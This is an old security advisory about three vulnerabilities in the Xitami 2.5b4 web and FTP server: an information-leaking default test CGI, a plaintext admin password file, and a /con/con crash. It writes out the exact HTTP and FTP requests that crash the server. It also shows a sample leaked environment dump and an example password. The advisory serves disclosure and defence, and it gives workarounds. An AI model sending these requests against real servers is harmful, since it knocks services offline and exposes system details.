Network Security Solutions Inc. Security AdvisorY (Philippine based Security Company) Http://www.Nssolution.net Http://connect.to/nssi ]*** Xitami WEB/FTP release 2.5b4 Server Multiple Security Vulnerabilities ***[ Author: Abraham Lincoln handle: zer0logic Email : Abraham@nssolution.net, zer0logic@PrivacyX.Com, Abraham@Digital-Defense-Network.Net Date Discovered: November 29, 2000 Vendor: iMatix Corporation Disclaimer: This paper is intended for informational purpose only. The Author is not responsible for the the Use and/or potential effects of these advisories. Read this at your own risk! or not at all. 1] 1st Vulnerability - TestCgi.exe file vulnerability Version Affected: Xitami Web Server release 2.5b4 for Win 95 / 98 / NT / Win2k Local : Yes Remote: Yes Risk: Medium Problem Description: - Xitami Webservers default installation /Cgi-Bin directory has a Vulnerability that allows remote users to View information regarding your system and Webserver's Directory by executing TestCgi.exe using your browser sample: Http://www.Target.com/cgi-bin/testcgi Sample output: Environment Variables COMPUTERNAME = MYSERVER COMSPEC = C:\WINNT\system32\cmd.exe HOMEDRIVE = C: HOMEPATH = \ LOGONSERVER = \\MYSERVER NUMBER_OF_PROCESSORS = 1 OS = Windows_NT OS2LIBPATH = C:\WINNT\system32\os2\dll; PATH = C:\WINNT\system32;C:\WINNT PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Family 6 Model 8 Stepping 3, GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 0803 SYSTEMDRIVE = C: SYSTEMROOT = C:\WINNT TEMP = C:\TEMP TMP = C:\TEMP USERDOMAIN = MYSERVER USERNAME = Administrator USERPROFILE = C:\WINNT\Profiles\Administrator WINDIR = C:\WINNT HTTP_ACCEPT_CHARSET = iso-8859-1,*,utf-8 HTTP_ACCEPT_LANGUAGE = en HTTP_ACCEPT_ENCODING = gzip HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* HTTP_HOST = 127.0.0.1 HTTP_USER_AGENT = Mozilla/4.75 [en] (WinNT; U) HTTP_CONNECTION = Keep-Alive HTTP_CONTENT_LENGTH = 0 SERVER_SOFTWARE = Xitami SERVER_VERSION = 2.5b4 SERVER_NAME = 127.0.0.1 SERVER_URL = http://127.0.0.1/ SERVER_PORT = 0 SERVER_PROTOCOL = HTTP/1.1 SERVER_SECURITY = - GATEWAY_INTERFACE = CGI/1.1 REQUEST_METHOD = GET QUERY_METHOD = GET SCRIPT_PATH = cgi-bin SCRIPT_NAME = /cgi-bin/testcgi CONTENT_TYPE = CONTENT_LENGTH = 0 REMOTE_USER = - REMOTE_HOST = 127.0.0.1 REMOTE_ADDR = 127.0.0.1 PATH_INFO = PATH_TRANSLATED = C:/Xitami/webpages DOCUMENT_ROOT = C:/Xitami/webpages CGI_ROOT = C:/Xitami/cgi-bin CGI_URL = /cgi-bin CGI_STDIN = C:\TEMP\pipe0001.cgi CGI_STDOUT = C:\TEMP\pipe0001.cgo CGI_STDERR = cgierr.log The Problem lies in the Default Installation of Xitami Webserver in /cgi-bin directory where testcgi.exe is located. this problem could allow a malicious user to gain information about your system that can be used to Penetrate the whole system. Work Around: Delete testcgi.exe file, or disable cgi-bin directory in Xitami Administration under cgi properties and always don't use any default installation always re configure your webserver after installing. Read some articles regarding WWW Security FAQ and CGI Vulnerabilities @ http://www.w3.org/Security/Faq/ 2] 2nd Vulnerability - Plain text Password vulnerability Version Affected: Xitami Web Server release 2.5b4 for Win 95 / 98 / NT / Win2k Local : Yes Remote: No Risk: Medium Problem Description: - I Discovered that Xitami WEbserver is storing Plain Text Password of Xitami Webserver Administration to defaults.aut file in default installation folder of Xitami webserver w/c is C:\Xitami. even if you gonna change the installation folder its still the the same. Example: defaults.aut # Created at installation time # [/Admin] admin="root123" <----- admin=username password=root123 [Private] Jacky=robusta The Problem lies when the attacker gains a physical access to Xitami root directory and opens the file Defaults.Aut the attacker may use this to gain administrator access to webserver Administration example: http://localhost/admin then the attacker enters the username and the password that stores in defaults.aut then the attacker already gains a full access to the web server administration site. And if you try to put the password file to other folder next time you logon to Xitami WEb Administration site this error will appear --> Abort at smthttp:Resolve-Virtual-Hostname: (Have-Client-Request, Finished-Event) And Causes the Webserver to Un-usable and you need to re install the whole Application. Work around: Don't leave your Workstation or Server open to Physical Access to the root directory of Xitami web server always change the default folder for the webserver instead of using C:\Xitami. 3] 3rd Vulnerability - Xitami Webserver and FTP Server for Win95/Win98 is Affected by /CON/CON exploit Version Affected: Xitami Web Server release 2.5b4 for Win 95 / 98 Local : Yes Remote: Yes Risk: High Problem Description: - Xitami Webserver and FTP Server is still Vulnerable w/ /Con/Con bug of Windows 95 and 98 that causes the Webserver and FTP Server to Shutdown/Crash and sometimes even the whole Operating System gets a Fatal Error. the Application needs to re-start again to perform normal operation. The Problem lies when the attacker send this request to the Webserver -->GET /con/con HTTP/1.0 by using telnet client to execute this to remote host type -->Telnet 80 if you are already connected try to Execute the GET /con/con HTTP/1.0 command then press Enter. The Server will Now crash or Shutdown and If the Operating System is Not Patch with Con/Con Bug. On the FTP Server try to login as a Anonymous user or any user that allows access to FTP Server then execute this Command Ftp>cd /con/con the FTP Server will disconnect you from remote host and it will Shutdown or Crash. Work Around: Install the Con/Con Bug PATCH to your Operating System, Patch is Available @ Microsoft Website or @ http://packetstormsecurity.org/Win/ConConFix2.zip coz` the bug also lies on ur O.S. Vendor Status: iMatix Corporation has been notified of this Vulnerability but no patch has been issued yet. NOTE: Sorry for the grammar etc... coz` this is just a 5 Minute Exploit if u have some questions email me.. all spam mails and lame emails are just ignored. -zer0logic- Related Links: Http://www.nssolution.net Http://connect.to/nssi Http://www.Digital-Defense-Network.Net Feedback and Inquiries: If you have any questions, inquiries, feedback, concerns and updates pls don't hesitate to email us. For Inquiries,Concerns and updates - Info@Nssolution.net for Comments and Questions - Abraham@nssolution.net ,lincoln@privacyx.com zer0logic@privacyx.com IRC - Dal.net #DDN Undernet #Hackphreak Copyright(c) 2000-2001 Network Security Solutions Inc. Permission is herby granted for the redistribution of this alert electronically. if you wish to reprint or modify this document Contact us 1st or email us at: info@Nssolution.Net